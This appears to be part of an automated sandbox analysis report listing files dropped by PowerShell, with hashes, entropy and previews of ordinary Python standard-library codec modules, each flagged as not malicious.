                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nqqqhOz6f/XoHKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ncJxFplR:qqVLj62VJjRU8njOxLnrxLbrLKWJxTz
                                                                                                                                                                                                              MD5:15D67984C7486D079058D4DBA07DDBBE
                                                                                                                                                                                                              SHA1:51AE51CD6ED99E4B594A5EFF1621308AA89DE532
                                                                                                                                                                                                              SHA-256:8FD6E86DFB38006E753B3B0301AA4B377C64C25F4EC9E6333FC99C3F06E90917
                                                                                                                                                                                                              SHA-512:46F3A96CE463669D8AD256C53C84EE201FB3D1EC0BEEEE55E622E75E93D1C9AA272BC0A414F3E65123C9BB1972BEEC9A8F43B2B9ACF849A2361DB188EE3F7836
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# cp950.py: Python Unicode Codec for CP950..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_tw, codecs..import _multibytecodec as mbc....codec = _codecs_tw.getcodec('cp950')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp950',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1090
                                                                                                                                                                                                              Entropy (8bit):4.603655042489424
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nsqVsOzff/XoL2KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9TcJxFplR:sqHwU62VJjRU8njOxLnrxLbrLKKJxTz
                                                                                                                                                                                                              MD5:F1FAE768C9FF8329D237608533530CED
                                                                                                                                                                                                              SHA1:3167902E4F9294DB74131FA2CE505E2F62B9C9B4
                                                                                                                                                                                                              SHA-256:78265BA431395662E7252A9B79BC2A75FFE438DB872B2CF1CBCFB243D83F0C87
                                                                                                                                                                                                              SHA-512:F726B7652435D174D1D84578A9278DD6B751B62CE231247CE4299860A5A4B2E1DB1D243B370625633D526278D30F2D05BBEBA9FC9E8312A103C455C65E802D68
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# euc_jis_2004.py: Python Unicode Codec for EUC_JIS_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jis_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jis_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incrementa
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1090
                                                                                                                                                                                                              Entropy (8bit):4.624592201957947
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nrqLOzff/XoL1KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9IcJxFplR:rqAwl62VJjRU8njOxLnrxLbrLKLJxTz
                                                                                                                                                                                                              MD5:45A11BD69244CE2DCC3FF49206AD041B
                                                                                                                                                                                                              SHA1:C0FF2F0406F4158D26DA4FC850584D14764FCA55
                                                                                                                                                                                                              SHA-256:12CA22A7DB25D9EEEF9BF5FACDC5594E3165CCF451528D36E3B68A03989521AC
                                                                                                                                                                                                              SHA-512:06AFD42F84A6E83A55645C82A638A7AF6C545401570EB3871913060FCBCC8D348583F589E3133745A6584998493C35DE25F66336E7D4F48EAC1BFDD6C35D08D6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# euc_jisx0213.py: Python Unicode Codec for EUC_JISX0213..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jisx0213')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jisx0213',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incrementa
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1066
                                                                                                                                                                                                              Entropy (8bit):4.531522047071056
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:n9qNOzff/XoLjKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9KcJxFplR:9q2wL62VJjRU8njOxLnrxLbrLKlJxTz
                                                                                                                                                                                                              MD5:0F2187EA4FC89DA2F54522EF29F58A7F
                                                                                                                                                                                                              SHA1:9DE39800CBBD630D7D4A1504C1A07F334EF3FAC5
                                                                                                                                                                                                              SHA-256:8927683A4234B936BE1935B8A799BE78520438BB5EA072499D51E7FE3D182987
                                                                                                                                                                                                              SHA-512:61BDFF78DE0A5E781C47F692620F7ACCD78AA006F530D478502A0905D51312B499E119F2EAA5524F2CEEF3CC4950F2865A1EFCFFF23BB4B9702579E0F3AEC97C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# euc_jp.py: Python Unicode Codec for EUC_JP..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jp')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jp',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1066
                                                                                                                                                                                                              Entropy (8bit):4.509188463695804
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nSBqnChOzSf/Xoap0KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9DJFc3:EqnXzao62VJjRU8njOxLnrxLbrLK9J+3
                                                                                                                                                                                                              MD5:B6EF8BD54861FA5D1E0AFF68F50F2913
                                                                                                                                                                                                              SHA1:3CB1AC8785AF724B359BEFBFC3758D918067B77A
                                                                                                                                                                                                              SHA-256:03AFE0CF8020529EAD00A0EA26A7131D354994CD2352D42F9032216B3748EA91
                                                                                                                                                                                                              SHA-512:B8147C8F711BC1ACE96FB2769F79A54728F7A744FCCD3AA4BE1257E8F09507DEDE44CF9F5C1F089BB88F11A88D372874EB343BB48AFE639A6C7E8D27204BFA05
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# euc_kr.py: Python Unicode Codec for EUC_KR..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('euc_kr')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_kr',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1070
                                                                                                                                                                                                              Entropy (8bit):4.573121414528306
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nBMqgOz+f/Xo1GoKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9zcJxFpz:Wq5P1l62VJjRU8njOxLnrxLbrLKSJxTz
                                                                                                                                                                                                              MD5:40B18EE51A3241C53EF5CBC6C019997D
                                                                                                                                                                                                              SHA1:C4F48863B74CB56844A2CC68AF9629D9407B7CF7
                                                                                                                                                                                                              SHA-256:0D9C1DB7E2959E60E4F6CB4B97C884585668C55B48F2D9D715B2BDAF5E78C671
                                                                                                                                                                                                              SHA-512:12952CBED997D8E4F3608F2DA4BA0FAC468D7D48E7685556E3669AF18FC6C238688713894E4490AACDC05C253242ADE9C88E522DC45EB9D5827E29548108D5AE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# gb18030.py: Python Unicode Codec for GB18030..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gb18030')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gb18030',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. s
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1066
                                                                                                                                                                                                              Entropy (8bit):4.554621344303813
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nB6q6Oz+f/Xo11ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9jcJxFpz:oq3P11t62VJjRU8njOxLnrxLbrLK+Jx/
                                                                                                                                                                                                              MD5:72F02C10927F33B52DF6549FF1F52E60
                                                                                                                                                                                                              SHA1:6C666F6A4C36D0C3CBD944216E170E26D7B5D91A
                                                                                                                                                                                                              SHA-256:2B5573EBF7FDC20DCF126633ADF0B7283C08629D36DBEFA669C985C9DDB98EA7
                                                                                                                                                                                                              SHA-512:F7F0D5C10490026F0809714BEED7CB2F5AB284C7BDC05BCBDF7C690A255DBA59F815B5524D88F5ED35CD6FD668C93695126EF7153CCBFA5B58BAA5E151839C51
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# gb2312.py: Python Unicode Codec for GB2312..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gb2312')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gb2312',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1054
                                                                                                                                                                                                              Entropy (8bit):4.504465163109839
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nBOEpqNOz+f/Xo1SKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9scJxFV:4Epq2P1k62VJjRU8njOxLnrxLbrLKPJd
                                                                                                                                                                                                              MD5:0D6CF4D6FFFB4B761BEBCEBC1D2C3CF3
                                                                                                                                                                                                              SHA1:64C7CD7A46E8CAE1CB9F0700035CA6BD2EC73C76
                                                                                                                                                                                                              SHA-256:9C7828E3B9661E39D4D75419A12B9D132FA9D0B4DAEC36F3DF51AD1C3A638DE3
                                                                                                                                                                                                              SHA-512:0F4F577C2FB46AB6B6D8DD6CFB5F89C8748F67E864D9AB6E3D92904BB0AE9EDB6239CABDF8A8F9B11238EEB60870EB819499B4A942E2D3B5CB7032F444246FCF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# gbk.py: Python Unicode Codec for GBK..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gbk')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gbk',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=Stre
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1563
                                                                                                                                                                                                              Entropy (8bit):4.660866418659877
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Xtc/QX1AIgs1AIc1wX1euM8ivIvPTKs3ntJxHjH:XS/QX/gs/cmX8uAA3TKsdrH
                                                                                                                                                                                                              MD5:1E55C95602534092B4DB3ED99CB9E67C
                                                                                                                                                                                                              SHA1:D1DBA179C7F3B0FF22D4F1713275D0C48637BB48
                                                                                                                                                                                                              SHA-256:5881C1AEEEB5F9CD27CE0E0E62AB9D6551F094955DBD52DC8184165DAF78AEBA
                                                                                                                                                                                                              SHA-512:84DACC6B4CBFBB99D7D6F0124EF1E7B26035C7249730EB1C185B60A750DE2548CA60E8A939DF8445D5DDDF1F8D397708A264D9FD7771C674C7DA889C306C9D93
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""Python 'hex_codec' Codec - 2-digit hex content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import binascii....### Codec APIs....def hex_encode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.b2a_hex(input), len(input))....def hex_decode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.a2b_hex(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return hex_encode(input, errors).. def decode(self, input, errors='strict'):.. return hex_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. assert self.errors == 'strict'.. return binascii.b2a_hex(input)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. assert self.errors == 'strict'..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13789
                                                                                                                                                                                                              Entropy (8bit):4.607934099089844
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:zbhsuOTDvRFUrXPLouhIAs2+ijLoM69Ne/DD6e:STjuhIAlgM6G6e
                                                                                                                                                                                                              MD5:1332CCB5750EB756B2856CCAD9E18CC1
                                                                                                                                                                                                              SHA1:ACDBF93730FB0420EA5B77AFE7E3282669829EF4
                                                                                                                                                                                                              SHA-256:681FF6A2273BD64450E04FC6F04B2EC63015A91490E30A31E25ED193708C99D4
                                                                                                                                                                                                              SHA-512:6F43760A54CB494E48B8C9A659505727246AEAF539AD4A35AFE6F4F5D0E4A84C2F5F0ED5055794DE2D575E78D5A5D1497EB795F35D8F5533DF955587EBC38FD4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'hp_roman8.txt' with gencodec.py..... Based on data from ftp://dkuug.dk/i18n/charmaps/HP-ROMAN8 (Keld Simonsen).... Original source: LaserJet IIP Printer User's Manual HP part no.. 33471-90901, Hewlet-Packard, June 1989..... (Used with permission)...."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.Strea
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1050
                                                                                                                                                                                                              Entropy (8bit):4.49858978606931
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nvpqxOz+f/Xo1cZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFpz:vpqyP1ct62VJjRU8njOxLnrxLbrLK5Jd
                                                                                                                                                                                                              MD5:78235EEDFAE419F3CC13044D7890799B
                                                                                                                                                                                                              SHA1:5BF1944AC39D99B3777CCD61DB7FAE3FF0D3E936
                                                                                                                                                                                                              SHA-256:2601DC6EF938FF87BD2024B3C4785254F2B3DD4D8D34D8F63E254D7B8545B077
                                                                                                                                                                                                              SHA-512:F5B7383FC8CBBAA13E8D101DD264D0F7952CD3A681F6746B5D941381A7CD39BE808D3E15375CF3778AC80D026658D494FA410CE1904683BD873D91C55DA9CA41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# hz.py: Python Unicode Codec for HZ..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('hz')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='hz',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamRe
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10027
                                                                                                                                                                                                              Entropy (8bit):4.492934350217829
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:g2wxhP5XBp7Z/J/8V2zbxofjEY7pKrlIRYUnIzSGAy4DYvRv3:gPvPjp7q2zbIbwDcGx
                                                                                                                                                                                                              MD5:04477AE720F73BBAC7793082CC0DFC9C
                                                                                                                                                                                                              SHA1:D29599BAC27431F1BC3CF2A45FD43FB7204C2599
                                                                                                                                                                                                              SHA-256:0C2181970F9ED35031700453022EE123069DC207200BB2F74C340CC1B71BA0DE
                                                                                                                                                                                                              SHA-512:BAC1387BC56D8AE123A2C5409884483A004EDDAF6C752651E53CEA54BDD34A605CBB9754F05207CB59EFD120E60E5483FD3ED6CEC0A181200DA26992B15503AD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:# This module implements the RFCs 3490 (IDNA) and 3491 (Nameprep)....import stringprep, re, codecs..from unicodedata import ucd_3_2_0 as unicodedata....# IDNA section 3.1..dots = re.compile("[\u002E\u3002\uFF0E\uFF61]")....# IDNA section 5..ace_prefix = b"xn--"..sace_prefix = "xn--"....# This assumes query strings, so AllowUnassigned is true..def nameprep(label):.. # Map.. newlabel = [].. for c in label:.. if stringprep.in_table_b1(c):.. # Map to nothing.. continue.. newlabel.append(stringprep.map_table_b2(c)).. label = "".join(newlabel).... # Normalize.. label = unicodedata.normalize("NFKC", label).... # Prohibit.. for c in label:.. if stringprep.in_table_c12(c) or \.. stringprep.in_table_c22(c) or \.. stringprep.in_table_c3(c) or \.. stringprep.in_table_c4(c) or \.. stringprep.in_table_c5(c) or \.. stringprep.in_table_c6(c) or \.. stringprep.in_table_c7(c) or
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1092
                                                                                                                                                                                                              Entropy (8bit):4.599723694318225
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:n9qdOz0f/XojmKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFplR:9qmFU62VJjRU8njOxLnrxLbrLKZJxTz
                                                                                                                                                                                                              MD5:0607F8E6310A0B601897FF8EC76FF2C4
                                                                                                                                                                                                              SHA1:3839A936E2792722D3F157F11965BF510241C0FA
                                                                                                                                                                                                              SHA-256:7169767DD6732A80A0B665315588EF9CFF2DF4D495A86BC0BDD22B5C9F0644B9
                                                                                                                                                                                                              SHA-512:C763E0D3AFA5DBB7FA96D03A52F0F5828A61E8FF24523BF62A852C989DD3BFBBFC3DA4535B5401A78E47FE16F3EA33364BA63655D91A6A12516315E231F23B15
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# iso2022_jp.py: Python Unicode Codec for ISO2022_JP..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1100
                                                                                                                                                                                                              Entropy (8bit):4.625134249310359
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nhq1Oz0f/XojglKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9CcJxFplR:hquF8J62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                                              MD5:4D2B0675DE1A9AFB3553B5D5E894020C
                                                                                                                                                                                                              SHA1:A9B6F704D09F7A0B5182BE7C3581D321BA4DDA76
                                                                                                                                                                                                              SHA-256:627D3BDB5D3BC70DD00E51199B689D1C225EFE747A2DB8D5938E6AF78263F572
                                                                                                                                                                                                              SHA-512:AC8E08AA4A2235BF20C563EC1A466B666A39F09CCD4AE681CD34DCF51754E3B8C860D557354691D170ABCDE43029B3B45E5597AADDED398577F9A90C74FADC57
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# iso2022_jp_1.py: Python Unicode Codec for ISO2022_JP_1..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_1')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_1',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1100
                                                                                                                                                                                                              Entropy (8bit):4.611453480597579
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nnSqgOz0f/Xoj7ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9VcJxFpz:nSq5F3t62VJjRU8njOxLnrxLbrLK0Jx/
                                                                                                                                                                                                              MD5:A4798D8B5DEE38BCCF3CBEAD235F392E
                                                                                                                                                                                                              SHA1:8971456D5A2C4A3255592399EE1141E119880774
                                                                                                                                                                                                              SHA-256:DC680A0E34DCE73756F0E3B5CBB23DD819022BE7E10F80E55289A5EAB9ED7C2E
                                                                                                                                                                                                              SHA-512:E329124E3ADA51C303556CA0C6B5B4644ED76E6F43C943BFE72F318928EF1DAA6121FE545480F4092F92B05CD25315D3E5B7ADB09E63985E9D8879BA3A751C2B
                                                                                                                                                                                                              Malicious:false
